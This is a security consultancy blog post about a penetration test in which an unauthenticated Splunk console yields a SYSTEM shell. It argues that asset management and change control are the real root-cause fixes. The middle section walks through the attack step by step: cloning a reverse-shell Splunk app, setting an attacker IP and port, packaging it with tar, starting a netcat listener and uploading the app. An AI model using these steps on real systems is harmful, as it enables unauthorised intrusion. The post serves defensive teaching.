An Introduction to Our View
What better way to start our technical series blog than with equating technical issues with deep core fundamental ones? We pride ourselves on dismantling the status quo surrounding how issues are perceived within the organizations that we work with. That generally means our job is demystifying technical issues into actionable roadmaps for the clients to implement — not just to address the technical issue, but to fundamentally mature their information security program to discover root causes and defend against them in the future.
“We pride ourselves on dismantling the status quo surrounding how issues are perceived within the organizations that we work with.”
Root Cause Analysis
The idea of “root-cause” analysis has become a commoditized string of words in the field over the years. The uptake and prevalence of multidimensional “remediation” is far from what it should be. This is particularly apparent when we get the opportunity to help clients through similar issues they’ve had in the past. The “why” behind the client’s status quo becomes much clearer when we look at the guidance that was provided by the previous assessor, which most times, simply centers on fixing the host, URL, or software package associated with a finding on a “report” that was given.
We’re not here to discuss those details in particular, but the fact remains that understanding the chain of controls necessary to truly facilitate — what we call “remediation” — is far greater than those promoted within reports.
This lack of understanding is clearly making resilient security programs very hard to come by.
“Resilient” — You Say?
Resilient is another keyword in the cyber industry. We find it odd that a word, whose meaning is directly related to the prevalence of sustaining continued threats, is promoted by so many, yet the meaning of it is lost or even non-existent when reading “remediation guidance” typically included with technical issues on reports. Resilient means that you can sustain all attacks, not just the ones that you know about. Resilient means processes are in place to protect against deviations to the established normality of operations. Resilient means that you know, at minimum, what you have to protect.
“Resilient means that you can sustain all attacks, not just the ones that you know about.”
Lapses in asset management are an area often responsible for breaches and/or initial footholds during penetration tests and red team assessments. In fact, it's appropriately the most important control called out by leading control frameworks (NIST, SANS, CSC). Often this is a result of weak and in some cases non-existent change control process. Other factors such as non-existing hardening templates for systems, policy violations, and or lack of business processes can also contribute to asset management mishaps. Too often, default passwords, overly permissive services, and application misuse become the first steps to a full compromise.
Let’s take a look at how one type of unintentional (seemingly innocent) lapses can lead to cracks in your entire environment.
Splunk Service Misuse
The following example is based on a real-world assessment our team at Vartai performed some time ago. During a network discovery scan looking for specific and known web service ports, we encountered a service hosted on port 8000. A common application which defaults to port 8000 is Splunk. Splunk can be used to search, monitor, and analyze all shapes and sizes of logs and big data. To support these functions, there is an underlying script execution feature that, if left unchecked, can be the threat actor’s entry point. In this instance, a privileged user violated the information security policy and installed Splunk without going through change control. The installed version of Splunk required no authentication, and we knew that some of Splunk’s functions allow for execution of scripts on both Windows and Unix type operating systems. The Splunk service itself was running in the context of the powerful
NT AUTHORITY\SYSTEM account which allowed us to obtain a connection on the victim machine as a privileged system shell.
The following is the Technical Walkthrough for the above scenario.
Summary of Steps
1) The Assessor discovers a Splunk server with no credentials and running an open console.
2) Splunk allows applications to be uploaded; the Assessor packages a custom application with an embedded reverse shell.
3) The Assessor leverages this attack to run remote commands on the underlying server and ultimately gain full control over it via a system shell.
Accessing the Console
First we find an accessible Splunk installation that is not protected password protected. Some versions of Splunk will switch turn off authentication after a trial period. After this, the program will turn off authentication and the Splunk console becomes accessible for all to use. Including , misuse.
Setting up our Attack Workspace
We create a new directory
tools with the
mkdir command within our Kali Linux installation.
Then we’ll copy a Splunk reverse shell script to our working folder, so we can access it.
We have tested the linked script in our lab and reviewed its code. Currently the script will function on both Windows and Linux machines alike, but today we’re going to demonstrate on Windows. Feel free to obtain a free copy via our GitHub repo below.
root@kali:~/tools# git clone https://github.com/vartai-security/reverse_shell_splunk.git
A simple splunk package for obtaining reverse shells on both Windows and most *nix systems. splunk administrative…
Editing the Reverse Shell Files
Using your preferred text editor in Kali, insert your attacking IP and preferred port in the "/root/tools/reverse_shell_splunk/run.ps1" file.
In the picture below, the victim machine will connect back to ip 10.10.14.2 on port 8555.
Packaging the Splunk App and Starting a Reverse Shell Listener
After you made your edits to the run.ps1 file above you’re ready to package the directory containing it so that it can be understood by the Splunk console.
In this case, we’re going to use the
tar command to package the directory into a file that can Splunk can understand, denoted by the file extension
tar -cvzf reverse_sell_splunk.spl reverse_shell_splunk
nc -nlvp 8555
Installing the Reverse Shell Splunk Application
Now we’re ready to install the newly packaged Splunk application into the Splunk Console so that we can execute it and make headway into gaining a shell on the installation.
You’ll want to click the “Gear” icon on the top left to action the menu to upload a new file.
Click “install app from file”
Browse and select the
reverse_shell_splunk.spl package you created earlier and select “upload”
Catching the Shell
Now we’re ready to listen for Splunk to connect to our system using the Splunk App that we’ve created. Since we had authority to upload a new application, Splunk Console trusts that we have no evil intention and thus will execute the application code contained within our package without thinking twice.
As you can see above, an
NT AUTHORITY\SYSTEM shell was achieved. From this point, we were able to further escalate our privileges to enterprise administrator during the duration of our engagement.
Unfortunately, scenarios like these are common and may have one or more factors.
Let’s talk examine some of these factors that don’t get communicated on standard reports when issues like these arise.
There is a reason that Asset Management, or the internal process to track, correlate, and document assets that are IP bound in the environment, is the most important control set called out by frameworks such as the CSC Top 20.
You cannot defend what you are not aware of. The fact is that Asset Management informs the rest of the Risk Management Framework (RMF). If you do not have an accurate listing of assets that you must protect, you do not have an accurate list of operating systems to patch, of applications to patch, of roles and access rights to lock down; the list continues.
You don’t have a list of devices to configure audit logging; you don’t have a list of devices for which you must apply a valid Security Configuration Checklist; and further — if you don’t have a baseline of security defined within a checklist, there’s no way that you can perform configuration management on a periodic basis to ensure those minimum security controls are operating as intended.
“You cannot defend what you are not aware of. The fact is that Asset Management informs the rest of the Risk Management Framework (RMF).”
In the example above, we had a valid system that was being tracked at the server level, the IP address/hostname level. That meant that the “system” was actually on an inventory, somewhere in the client’s environment. IT staff thought they were doing their job. They thought that’s what the compliance frameworks meant by “Asset Management.”
They were wrong.
Assets Are Not Just IP addresses
You see, there’s more to Asset Management than just having a list of IP addresses for each system in your environment. Asset Management is about “managing” the assets throughout the RMF. True Asset Management uses the meta-data associated with each asset as validated inputs to help govern virtually all of the supporting controls that you might think you need to secure a device (e.g., configuration management, logging, auditing, patch management, flaw remediation, vulnerability management, change control, administrative access,— the list goes on).
So, what is in the meta-data that is so important?
That’s where the power of true Asset Management can help you mature your other processes, but ultimately “Asset” in the sense of hacker, is just a port. A service. A protocol. Hosts have IP addresses; those IP addresses have ports (open or closed) which then have protocols tied to them. Those protocols have services, and so on along up the chain until we arrive at specific applications using those services, protocols, and ports to communicate data throughout your enterprise.
“When attackers “attack” they attack the port. They attack the service running on the port. They attack the application using the service running on the port.”
What does “Asset” really mean?
The takeaway here is that effective network security is centered around the ability to track your Assets the way that hackers track your assets. At the port, service, protocol, and application level. It sounds like a big task, and it is, which is why it’s so important and likely overlooked in the industry and throughout enterprise networks small and large.
But Sir, we have an SDLC!
The other main breakdown, associated with the client’s Software Development Lifecycle (SDLC), is also directly tied to their Asset Management.
In our example, the client had a formal process to validate and approved changes they knew about within the environment. This limited awareness ultimately led to a false-sense of security and a lack of critical thinking about how they defined a “change.”
“Changes in the environment happen all the time. In this case, a rogue change to install Splunk meant that the entire network fell to compromise.”
Changes in the environment happen all the time. In this case, a rogue change to install Splunk meant that the entire network fell to compromise. That change lived outside the defined SDLC process, and thus never had a chance of being discovered, let alone remediated.
The link to Asset Management is critical here. If the client was appropriately using network and application discovery tools to identify changes in their baseline state of “Assets,” (e.g., ports, protocols, services, applications) they would have identified the Splunk installation, thus preventing this compromise. The fact that Asset Management was only being performed at the IP address level was the first flaw in their internal processes. The second was the lack of Change Management maturity with respect to the granularity they were checking for new changes. The third, and not nearly the last issue, was the lack of integration between the change identification process and their validated SDLC process.
Back to Basics
Ultimately, we come back to the core principle of only being able to protect what you know you have. We could continue to define ways the entire enterprise strategy for security had failed to catch the client’s issue that led to compromise, but it would be a book, rather than a blog post.
“The final takeaway is that not only should a company work to fix issues that are found on security assessments, but they should look for a root cause analysis that drives enhanced capability and maturity throughout their entire Risk Management Framework.”
Each “finding” is an opportunity to look at the greater weaknesses that persist in the people, processes, and technology of the organization, not just another change request to disable a service, or uninstall a rogue application that led to their compromise on a security audit.
Having insight into the web of interactions necessary to deploy an effective security program is one of the most important abilities and responsibilities of the CISO and the rest of their security staff. At minimum, your assessment providers should help inform and augment these abilities.
Interested in hearing more about our services?
Contact us at email@example.com to discuss your unique project needs.